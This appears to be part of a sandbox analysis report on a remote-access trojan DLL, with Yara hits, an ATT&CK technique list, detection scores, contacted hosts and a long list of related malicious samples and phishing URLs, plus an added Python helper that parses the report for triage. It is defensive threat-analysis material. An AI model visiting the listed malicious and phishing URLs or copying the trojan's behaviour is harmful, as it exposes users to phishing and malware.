Source: Yara match  File source: 12.2.rundll32.exe.2caf50d0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 5.2.rundll32.exe.24c76550000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 5.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 4.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 17.2.rundll32.exe.19d796c0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 13.2.rundll32.exe.1e0a1960000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 4.2.rundll32.exe.2596ef30000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 11.2.rundll32.exe.1d54ab70000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 14.2.rundll32.exe.23d3f970000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.rundll32.exe.1dd420a0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 15.2.rundll32.exe.2d2ec850000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.rundll32.exe.13f23770000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 3.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 19.2.rundll32.exe.24f7dfe0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 16.2.rundll32.exe.20471360000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.2.rundll32.exe.1edf6db0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 3.2.rundll32.exe.2a89aaa0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 6992, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 6200, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 7112, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 7120, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 2496, type: MEMORYSTR
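The two listings above are typical of how a sandbox report reads for a .NET RAT: well over a hundred near-identical "Queries volume information" rows on font files (the .NET/GDI+ runtime touches every installed font when it enumerates font families, which is benign noise), a single registry read of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid (a stable per-install GUID that RATs commonly fold into a client identifier, and the row an analyst actually cares about), and the same Yara rule firing in every rundll32.exe instance, twice per process (one unpacked region per image base), so that 34 UNPACKEDPE hits describe one DLL loaded into 17 processes. The Python below is an added triage helper, not part of the Joe Sandbox report or of the Quasar project: it parses rows in the shape shown above into structured events, buckets the behaviour rows so noise is counted rather than read, and collapses the Yara hits per process index. The sample rows are constructed here from the shapes on this page; the bucket names and the `proc_index`/`region` field names are my own labels for the parts of Joe Sandbox's `<index>.<stage>.<process>.<base>.<region>.unpack` identifiers, not the tool's official terms.

```python
import re
from collections import Counter, defaultdict

# Constructed sample rows in the shape of the report's "Source:" listings
# (a subset, with the cells separated by two spaces; not a real report run).
BEHAVIOR_LINES = [
    r"Source: C:\Windows\System32\rundll32.exe  Queries volume information: C:\Windows\Fonts\georgia.ttf  VolumeInformation",
    r"Source: C:\Windows\System32\rundll32.exe  Queries volume information: C:\Windows\Fonts\msyh.ttc  VolumeInformation",
    r"Source: C:\Windows\System32\rundll32.exe  Queries volume information: C:\Windows\Fonts\msyh.ttc  VolumeInformation",
    r"Source: C:\Windows\System32\rundll32.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll  VolumeInformation",
    r"Source: C:\Windows\System32\rundll32.exe  Queries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll  VolumeInformation",
    r"Source: C:\Windows\System32\rundll32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography  MachineGuid",
]
YARA_LINES = [
    "Source: Yara match  File source: vstdlib_s64.dll.dll, type: SAMPLE",
    "Source: Yara match  File source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE",
    "Source: Yara match  File source: 13.2.rundll32.exe.1e0a1960000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match  File source: 5.2.rundll32.exe.7ffdfb180000.1.unpack, type: UNPACKEDPE",
    "Source: Yara match  File source: 5.2.rundll32.exe.24c76550000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match  File source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR",
]

# Process path, action, target (file path or registry key), then the last
# whitespace-separated token (behaviour category or registry value name).
BEHAVIOR_RE = re.compile(
    r"^Source: (?P<proc>.+?)\s+(?P<action>Queries volume information|Key value queried): "
    r"(?P<target>.+?)\s+(?P<detail>\S+)$"
)
YARA_RE = re.compile(r"^Source: Yara match\s*File source: (?P<src>.+), type: (?P<type>\w+)$")
# Assumed layout of Joe Sandbox unpack identifiers: <index>.<stage>.<process>.<base>.<region>.unpack
UNPACK_RE = re.compile(r"^(?P<idx>\d+)\.(?P<stage>\d+)\.(?P<proc>.+?)\.(?P<base>[0-9a-f]+)\.(?P<region>\d+)\.unpack$")


def parse_behavior(line):
    """Split one behaviour row into process, action, target and category; None if it is not one."""
    m = BEHAVIOR_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(ev):
    """Bucket a behaviour event (my own labels) so the noise can be counted instead of read."""
    target = ev["target"].lower()
    if ev["action"] == "Key value queried" and ev["detail"] == "MachineGuid":
        return "host-fingerprint"
    if target.startswith("c:\\windows\\fonts\\"):
        return "font-enumeration"
    if "\\microsoft.net\\assembly\\" in target:
        return "dotnet-assembly"
    return "other-file"


def parse_yara(line):
    """Parse one Yara match row; decode unpack identifiers and MEMORYSTR PIDs where present."""
    m = YARA_RE.match(line.strip())
    if not m:
        return None
    rec = {"type": m["type"], "source": m["src"]}
    if rec["type"] == "UNPACKEDPE":
        u = UNPACK_RE.match(rec["source"])
        if u:
            rec.update(proc_index=int(u["idx"]), process=u["proc"],
                       base=int(u["base"], 16), region=int(u["region"]))
    elif rec["type"] == "MEMORYSTR":
        pid = re.search(r"PID: (\d+)", rec["source"])
        if pid:
            rec["pid"] = int(pid.group(1))
    return rec


def summarize(behavior_lines, yara_lines):
    """Reduce the two listings to what an analyst wants at a glance."""
    events = [e for e in map(parse_behavior, behavior_lines) if e]
    matches = [m for m in map(parse_yara, yara_lines) if m]
    regions = defaultdict(set)  # "index.process" -> image bases that matched
    for m in matches:
        if "base" in m:
            regions[f"{m['proc_index']}.{m['process']}"].add(m["base"])
    return {
        "behavior_classes": dict(Counter(classify(e) for e in events)),
        "fingerprint_reads": [f"{e['target']}\\{e['detail']}" for e in events
                              if classify(e) == "host-fingerprint"],
        "unpacked_regions": {k: sorted(v) for k, v in regions.items()},
        "memorystr_pids": sorted(m["pid"] for m in matches if "pid" in m),
        "sample_matched": any(m["type"] == "SAMPLE" for m in matches),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(BEHAVIOR_LINES, YARA_LINES), indent=2))
```

Run against the full listing rather than the constructed subset, the font bucket absorbs the 143 font rows and the summary is left with one dotnet-assembly row, three self-reads of the sample, one MachineGuid read, and 17 process indexes each with two matched image bases.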

Remote Access Functionality

                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
ATT&CK tactic: techniques (the numbers preceding some techniques are reproduced as extracted from the report's matrix)

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
• Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
• Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
• Privilege Escalation: 112 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
• Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 112 Process Injection; 1 Obfuscated Files or Information; 1 Rundll32; 1 DLL Side-Loading
• Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
• Discovery: 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 12 System Information Discovery; Wi-Fi Discovery; Remote System Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
• Collection: 1 Input Capture; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
• Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
vstdlib_s64.dll.dll | 26% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
vstdlib_s64.dll.dll | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://telize.com/geoip | 0% | Avira URL Cloud | safe |
http://api.ipify.org/ | 0% | Avira URL Cloud | safe |
http://freegeoip.net/xml/ | 0% | Avira URL Cloud | safe |
https://argentina-e4162-default-rtdb.firebaseio.com/user.json | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
telize.com | 88.198.193.213 | true | true | | unknown
api.ipify.org | 104.26.13.205 | true | true | | unknown
freegeoip.net | 3.33.130.190 | true | true | | unknown
argentina-e4162-default-rtdb.firebaseio.com | 35.201.97.85 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | true | Avira URL Cloud: safe | unknown
http://freegeoip.net/xml/ | true | Avira URL Cloud: safe | unknown
https://argentina-e4162-default-rtdb.firebaseio.com/user.json | false | Avira URL Cloud: safe | unknown
http://telize.com/geoip | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
35.201.97.85 | argentina-e4162-default-rtdb.firebaseio.com | United States | 15169 | GOOGLEUS | false
88.198.193.213 | telize.com | Germany | 24940 | HETZNER-ASDE | true
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | true
3.33.130.190 | freegeoip.net | United States | 8987 | AMAZONEXPANSIONGB | true
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1473780
                                Start date and time:2024-07-15 21:06:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 10m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:25
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:vstdlib_s64.dll.dll
                                (renamed file extension from exe to dll)
                                Original Sample Name:vstdlib_s64.dll.exe
                                Detection:MAL
                                Classification:mal80.troj.spyw.evad.winDLL@38/2@4/4
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: vstdlib_s64.dll.dll
Time | Type | Description
15:07:10 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
15:07:18 | API Interceptor | 1535718x Sleep call for process: rundll32.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                88.198.193.2136OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • telize.com/geoip
                                K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                • telize.com/geoip
                                30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                • telize.com/geoip
                                XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                • www.telize.com/geoip
                                svchost.exeGet hashmaliciousQuasarBrowse
                                • www.telize.com/geoip
                                conn.exeGet hashmaliciousQuasarBrowse
                                • www.telize.com/geoip
                                104.26.13.205golang-modules.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/
                                242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                • api.ipify.org/?format=wef
                                Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                • api.ipify.org/
                                ld.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                • api.ipify.org/
                                ReturnLegend.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                • api.ipify.org/
                                Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                • api.ipify.org/?format=json
                                3.33.130.190New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • www.mscuration.com/txr6/
                                ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                                • www.shapenbuy.com/5xz5/
                                BL.exeGet hashmaliciousFormBookBrowse
                                • www.abc8web.com/sm5e/
                                OrderPI.exeGet hashmaliciousFormBookBrowse
                                • www.lextcommunities.com/qt3s/
                                docs_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx
                                payment advice.exeGet hashmaliciousFormBookBrowse
                                • www.abc8web.com/sm5e/
                                vNrcPvMYLZmn2cc.exeGet hashmaliciousFormBookBrowse
                                • www.zerolength.xyz/mc10/?yrCDSlw=+hw+aGSrqNJPXAKTI+d1f9+ihmayTPYKE17mK9H9odLh7YQ+aA2Ta0l7fr2FH5vYxut0&Jlt=Y4Ctjz3PDNY8yDR
                                MV SHUHA QUEEN II.exeGet hashmaliciousFormBookBrowse
                                • www.abc8web.com/sm5e/
                                3O0zPitVnR82n5Y.exeGet hashmaliciousFormBookBrowse
                                • www.fundraiserstuffies.com/sm5u/
                                rNuevalistadepedidos.exeGet hashmaliciousFormBookBrowse
                                • www.anavamarketing.com/iat1/
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                telize.com6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                • 88.198.193.213
                                30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                svchost.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                conn.exeGet hashmaliciousQuasarBrowse
                                • 88.198.193.213
                                freegeoip.net6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 15.197.148.33
                                Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                • 15.197.148.33
                                z4XlS0wTQM.exeGet hashmaliciousQuasarBrowse
                                • 15.197.148.33
                                Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                • 3.33.130.190
                                K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                • 172.67.75.176
                                Commission_Dec23_Exec_Approval.xlsx.jsGet hashmaliciousBlackshadesBrowse
                                • 104.26.15.73
                                30EAFDB7C2C580890C4FB2A7101DB1D22C88BD723603F.exeGet hashmaliciousQuasarBrowse
                                • 104.26.15.73
                                XIiRHEaA9R.exeGet hashmaliciousQuasarBrowse
                                • 104.26.15.73
                                Outstanding Secured Credit Invoices.pdf.exeGet hashmaliciousBlackshadesBrowse
                                • 172.67.75.176
                                Invoice.exeGet hashmaliciousBlackshadesBrowse
                                • 104.26.14.73
                                api.ipify.org6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 104.26.12.205
                                Zam#U00f3wienie - #20240715-A09461_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                0001.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                Great Lake - Quote#474701.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                Josephine Lawrence items.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                • 172.67.74.152
                                Hhf5a5ATds.exeGet hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                Hhf5a5ATds.exeGet hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                https://pttgov-gw.top/help/Get hashmaliciousUnknownBrowse
                                • 104.26.13.205
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUS6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                                • 104.26.12.205
                                https://34.75.2o2.lol/XVjBTRlVwbW40SnF4OXJSYmJkbVUxSkdPT2cwQWJtMTRNNVA3VDN5UVRVaUlHR0pmdmZZd1Q5dUp0RUlwY0pPVGpKcUR3bXhYODB1NWtVTUk3RjdGUnJ6YnhHeG1TOXE0Z1MwUVhKRndKN1N5UVJPS3V1L1NycmpzdFJHQWRKbndEbVg4ODMzNE1nQ2hiazFtQmR3VEZJeHYyWXAycTEzUEZMODFqTGxmdjd2SDlNQVhHeFAzYU5XMy0td2Y2dStNQ0JBZHl6a1JJVi0tbS82L0xUaU04RU1Qc2dWdldWbm02QT09?cid=2117374656Get hashmaliciousUnknownBrowse
                                • 104.16.117.116
                                https://cloud-drive.services/i/a5b210032126e461fbaa7518681a0ce06Get hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                855d156285ccf04888dae255256e42682756098471514f6155c7a5ef8556a95f.zipGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.96.3
                                https://fyui.short.gy/Pu658cGet hashmaliciousUnknownBrowse
                                • 172.64.155.119
                                http://links.888brands.net/ctt?m=34615482&r=LTg2NDEzNjA1MDIS1&b=0&j=MjUyMjI0NDU0OAS2&mt=1&kt=12&kx=1&k=888-external-en_custhelp_com_a&kd=//cvgmilano.com/img/#tokyo1@tira.co.jpGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                • 104.17.25.14
                                Complete with Docusign dmoore@nsedc.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                • 104.17.2.184
                                https://tinyurl.com/2kfd9dv5%7CnetworkConnections_direction_1Get hashmaliciousUnknownBrowse
                                • 104.17.3.184
                                Reference ID6f5f047b6cdf41716e164ec64879e463.emlGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                https://www.axians-ewaste.com/faq/anleitung-installation-signatursoftware/Get hashmaliciousUnknownBrowse
                                • 104.17.25.14
                                AMAZONEXPANSIONGBhttp://24usred.com/0kqZRSGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
https://skmadvocates.co.ke/dGt/bm9BkNQTsUBoAHHVY36CsnStq75FyBQg8CeZJT4xRH2NEhgsnPSR8gtKpSjbvPtdZbrTnuyG33FV5tDBJraTiqCTpLfzVJSeqV8cEPCNLNV42udbNRkGNUXivyFTVq9xo6 | malicious | HTMLPhisher | 3.33.220.150
http://itumbrellagroup.com | malicious | Unknown | 52.223.39.232
New PO.exe | malicious | FormBook, PureLog Stealer | 3.33.130.190
ORDEN_240715189833.IMG | malicious | DarkTortilla, FormBook | 3.33.244.179
https://mettamasklogiinf.gitbook.io/us/ | malicious | Unknown | 3.33.235.18
DHL_AWB#6078538091.exe | malicious | FormBook | 3.33.244.179
http://service-public-finances.com/ | malicious | Phisher | 52.223.40.198
http://api-connects.pages.dev/wallet.html,api-connects.pages.dev,172.66.46.230 | malicious | Unknown | 52.223.40.198
https://uspsdirect.one?t=guoi | malicious | Unknown | 52.223.40.198
Match: HETZNER-ASDE
6OiUEubyA8.msi | malicious | Quasar | 88.198.193.213
http://www.nicetours.net | malicious | Unknown | 46.4.249.94
http://4allpromo.com/ | malicious | Unknown | 136.243.44.113
c32420d2-f683-f305-71f5-f5966fa0459d.eml | malicious | HTMLPhisher | 95.217.66.83
